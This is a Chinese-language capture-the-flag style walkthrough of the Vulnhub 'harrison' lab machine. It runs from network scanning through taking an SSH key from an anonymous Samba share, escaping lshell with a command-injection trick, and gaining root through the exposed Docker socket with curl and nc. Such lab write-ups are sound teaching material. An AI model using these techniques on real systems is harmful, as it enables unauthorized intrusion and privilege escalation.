Vulnhub之Harrison靶机详细测试过程（提权成功）

Harrison

作者：jason huawen
靶机信息

名称: SP: harrison
地址：

1. https://www.vulnhub.com/entry/sp-harrison,302/

复制代码

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/Harrison]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:19:b1:e6      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.125  08:00:27:a8:46:b3      1      60  PCS Systemtechnik GmbH        

复制代码

利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.125 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 19:19 EDT
4. Nmap scan report for bogon (192.168.56.125)
5. Host is up (0.000094s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT    STATE SERVICE     VERSION
8. 22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   2048 5b87f1fe678fa6ba8b753c11343db6b8 (RSA)
11. |   256 93877e2e5e4ece7156a11c6bfc1f6e55 (ECDSA)
12. |_  256 c014c024e8a87ed4cda64225f3484794 (ED25519)
13. 445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
14. MAC Address: 08:00:27:A8:46:B3 (Oracle VirtualBox virtual NIC)
15. Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel
17. Host script results:
18. | smb2-time:
19. |   date: 2023-04-23T07:19:44
20. |_  start_date: N/A
21. | smb-security-mode:
22. |   account_used: guest
23. |   authentication_level: user
24. |   challenge_response: supported
25. |_  message_signing: disabled (dangerous, but default)
26. | smb2-security-mode:
27. |   311:
28. |_    Message signing enabled but not required
29. | smb-os-discovery:
30. |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
31. |   Computer name: harrison
32. |   NetBIOS computer name: HARRISON\x00
33. |   Domain name: \x00
34. |   FQDN: harrison
35. |_  System time: 2023-04-23T07:19:45+00:00
36. |_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
38. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
39. Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
40.                                                                

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、445（samba)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
2. └─$ smbclient -L 192.168.56.125                                
3. Password for [WORKGROUP\kali]:
4. Anonymous login successful
6.         Sharename       Type      Comment
7.         ---------       ----      -------
8.         Private         Disk      
9.         IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
10. Reconnecting with SMB1 for workgroup listing.
11. do_connect: Connection to 192.168.56.125 failed (Error NT_STATUS_CONNECTION_REFUSED)
12. Unable to connect with SMB1 -- no workgroup available
13.                                                                                                                              
14. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
15. └─$ smbclient //192.168.56.125/Private
16. Password for [WORKGROUP\kali]:
17. Anonymous login successful
18. Try "help" to get a list of possible commands.
19. smb: \> ls
20.   .                                   D        0  Thu Apr 18 12:55:51 2019
21.   ..                                  D        0  Thu Apr 18 12:12:55 2019
22.   .bash_logout                        H      220  Wed Apr  4 14:30:26 2018
23.   .profile                            H      807  Wed Apr  4 14:30:26 2018
24.   .bashrc                             H     3771  Wed Apr  4 14:30:26 2018
25.   silly_cats                          D        0  Thu Apr 18 12:55:51 2019
26.   .ssh                               DH        0  Thu Apr 18 12:42:57 2019
27.   flag.txt                            N       32  Thu Apr 18 12:14:18 2019
29.                 32894736 blocks of size 1024. 27322884 blocks available
30. smb: \> get flag.txt
31. getting file \flag.txt of size 32 as flag.txt (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
32. smb: \> cd .ssh
33. smb: \.ssh\> ls
34.   .                                   D        0  Thu Apr 18 12:42:57 2019
35.   ..                                  D        0  Thu Apr 18 12:55:51 2019
36.   authorized_keys                     N      399  Thu Apr 18 12:42:57 2019
37.   id_rsa                              A     1679  Thu Apr 18 12:14:17 2019
38.   id_rsa.pub                          A      399  Thu Apr 18 12:14:17 2019
40.                 32894736 blocks of size 1024. 27322884 blocks available
41. smb: \.ssh\> get id_rsa
42. getting file \.ssh\id_rsa of size 1679 as id_rsa (546.5 KiloBytes/sec) (average 334.2 KiloBytes/sec)
43. smb: \.ssh\> get id_rsa.pub
44. getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (194.8 KiloBytes/sec) (average 294.4 KiloBytes/sec)
45. smb: \.ssh\> get authorized_keys
46. getting file \.ssh\authorized_keys of size 399 as authorized_keys (129.9 KiloBytes/sec) (average 245.0 KiloBytes/sec)
47. smb: \.ssh\> cd ..
48. smb: \> cd silly_cats\
49. smb: \silly_cats\> ls
50.   .                                   D        0  Thu Apr 18 12:55:51 2019
51.   ..                                  D        0  Thu Apr 18 12:55:51 2019
52.   cat3.jpg                            N    38624  Mon Jan  8 13:30:10 2018
53.   cat1.jpg                            N    73946  Mon Jan  8 13:29:40 2018
54.   cat2.jpg                            N    74130  Mon Jan  8 13:29:32 2018
56.                 32894736 blocks of size 1024. 27322884 blocks available
57. smb: \silly_cats\> get cat1.jpg
58. getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (24070.2 KiloBytes/sec) (average 5743.3 KiloBytes/sec)
59. smb: \silly_cats\> get cat2.jpg
60. getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (24130.1 KiloBytes/sec) (average 9191.0 KiloBytes/sec)
61. smb: \silly_cats\> get cat3.jpg
62. getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (18858.5 KiloBytes/sec) (average 10265.2 KiloBytes/sec)
63. smb: \silly_cats\> quit

复制代码

1. ─(kali㉿kali)-[~/Vulnhub/Harrison]
2. └─$ enum4linux 192.168.56.125   
3. [+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
4.                                                                                                                              
5. S-1-22-1-1000 Unix User\harrison (Local User)      

复制代码

enum4linux识别出用户名harrison

1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
2. └─$ cat flag.txt     
3. It's not going to be that easy.

复制代码

没那么容易？

1.                                                                                                                            
2. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
3. └─$ chmod 400 id_rsa  
4.                                                                                                                              
5. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
6. └─$ ssh -i id_rsa harrison@192.168.56.125
7. The authenticity of host '192.168.56.125 (192.168.56.125)' can't be established.
8. ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
9. This key is not known by any other names.
10. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
11. Warning: Permanently added '192.168.56.125' (ED25519) to the list of known hosts.
13. Welcome to Harrison. Enjoy your shell.
15. Type '?' or 'help' to get the list of allowed commands
16. harrison:~$ id
17. *** forbidden command: id
18. harrison:~$

复制代码

虽然得到了shell,但是这是受限的shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
2. └─$ ssh -i id_rsa harrison@192.168.56.125 -t /bin/sh
3. *** forbidden shell escape: "/bin/sh"
4. This incident has been reported.
5. Connection to 192.168.56.125 closed.
6.                                                 

复制代码

用-t选项指定不同的shell没能逃脱受限的Shell

1. harrison:~$ echo $SHELL
2. *** forbidden path: /usr/bin/lshell

复制代码

可知为lshell

1. harrison:~$ echo && "bash"
3. harrison@harrison:~$ ls -alh
4. total 44K
5. drwxr-xr-x 1 harrison harrison 4.0K Apr 23 07:31 .
6. drwxr-xr-x 1 root     root     4.0K Apr 18  2019 ..
7. -rw-r--r-- 1 harrison harrison  220 Apr  4  2018 .bash_logout
8. -rw-r--r-- 1 harrison harrison 3.7K Apr  4  2018 .bashrc
9. drwx------ 2 harrison harrison 4.0K Apr 23 07:24 .cache
10. -rw------- 1 harrison harrison  272 Apr 23 07:31 .lhistory
11. -rw-r--r-- 1 harrison harrison  807 Apr  4  2018 .profile
12. drwxr-xr-x 1 harrison harrison 4.0K Apr 18  2019 .ssh
13. -rw-r--r-- 1 root     root       32 Apr 18  2019 flag.txt
14. drwxr-xr-x 2 root     root     4.0K Apr 18  2019 silly_cats
15. harrison@harrison:~$ cd /home
16. harrison@harrison:/home$ ls
17. harrison
18. harrison@harrison:/home$

复制代码

用echo && "bash"逃逸，成为正常的shell

1. harrison@harrison:/root$ ls -alh
2. total 20K
3. drwxr-xr-x 1 root root 4.0K Apr 18  2019 .
4. drwxr-xr-x 1 root root 4.0K Apr 23 07:16 ..
5. -rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
6. -rw-r--r-- 1 root root  148 Aug 17  2015 .profile
7. -rwxr--r-- 1 root root   49 Apr 18  2019 flag.txt
8. harrison@harrison:/root$ cat flag.txt
9. Nope. No flags here. Where do you think you are?

复制代码

提权

提权是通过docker实现的，但是过程太复杂了，是参考其他人的做法才能完成。
查看现有的容器

1. harrison@harrison:~$ cd /tmp
3. harrison@harrison:/tmp$ curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
4. [{"Id":"902f9eaf084a2da13ce02a097e80c39686c73c6af1ffcc78602c83dde49ae534","Names":["/nervous_proskuriakova"],"Image":"cont1:v1","ImageID":"sha256:6275c2bd4f72c6c417458fa6caecf2bc23bf823298650334c3c3bd42579aa95f","Command":"/bin/sh -c '/etc/init.d/smbd start && /etc/init.d/ssh start && bash' /bin/bash","Created":1682237761,"Ports":[{"IP":"0.0.0.0","PrivatePort":22,"PublicPort":22,"Type":"tcp"},{"IP":"0.0.0.0","PrivatePort":445,"PublicPort":445,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 56 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"a81871ff28475882e034ea03bb1aab0b2ba4d0d1271312250f1db62337acc2b0","EndpointID":"01e3e3658c213f253bd4d957175f1007e23e6e4c2d9268e14d80a36512d531fb","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

复制代码

创建新容器：

1. harrison@harrison:/tmp$ echo -e '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}' > container.json

复制代码

查看新创建的容器：

1. harrison@harrison:/tmp$ curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
2. {"Id":"ea0a8e5839ab3e2817b02fb086a63a776f06afcd5a4f742eb5d8a898aae3719f","Warnings":null}

复制代码

启动新容器：

1. harrison@harrison:/tmp$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ea0a/start

复制代码

连接新创建的容器：

1. harrison@harrison:/tmp$ nc -U /var/run/docker.sock
2. POST /containers/34b3/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
3. Host:
4. Connection: Upgrade
5. Upgrade: tcp   
7. HTTP/1.1 404 Not Found
8. Content-Type: application/vnd.docker.raw-stream
10. No such container: 34b3
11. harrison@harrison:/tmp$ nc -U /var/run/docker.sock
12. POST /containers/ea0a/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
13. Host:
14. Connection: Upgrade
15. Upgrade: tcp
17. HTTP/1.1 101 UPGRADED
18. Content-Type: application/vnd.docker.raw-stream
19. Connection: Upgrade
20. Upgrade: tcp
22. ls
23. ]bin
24. boot
25. dev
26. etc
27. home
28. lib
29. lib64
30. media
31. mnt
32. opt
33. os_root
34. proc
35. root
36. run
37. sbin
38. srv
39. sys
40. tmp
41. usr
42. var
43. cd os_root
44. ls -alh
45. �total 32K
46. drwx------ 3 root root 4.0K Apr 18  2019 .
47. drwxr-xr-x 1 root root 4.0K Apr 23 08:18 ..
48. -rw------- 1 root root  289 Apr 18  2019 .bash_history
49. -rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
50. drwxr-xr-x 3 root root 4.0K Apr 16  2019 .local
51. -rw-r--r-- 1 root root  148 Aug 17  2015 .profile
52. -rw-r--r-- 1 root root   66 Apr 18  2019 .selected_editor
53. -rwx------ 1 root root   73 Apr 18  2019 flag.txt
54. cat flag.txt
55. IDo you think you are out?
58. Just kidding, here is your flag: 1xcDF933mce

复制代码

注意这里所有的命令都需要保持容器ID一致

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！